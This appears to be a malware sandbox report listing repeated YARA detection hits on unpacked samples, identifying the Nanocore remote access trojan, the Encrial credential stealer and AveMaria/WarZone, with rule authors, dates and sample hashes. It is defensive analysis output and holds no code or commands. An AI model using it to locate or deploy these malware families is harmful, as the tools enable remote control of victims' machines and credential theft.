Source: 40.2.KetqqsbuJ.exe.40006e6.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c30000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3d08a28.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c00000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c00000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 40.2.KetqqsbuJ.exe.5160000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.5160000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.40006e6.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.40006e6.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.5280000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.5280000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 40.2.KetqqsbuJ.exe.6c70000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c70000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c40000.30.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c40000.30.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.60a0000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.60a0000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 40.2.KetqqsbuJ.exe.3e88e65.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3e88e65.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c10000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c10000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3ca9930.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3ca9930.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6cc0000.36.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6cc0000.36.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
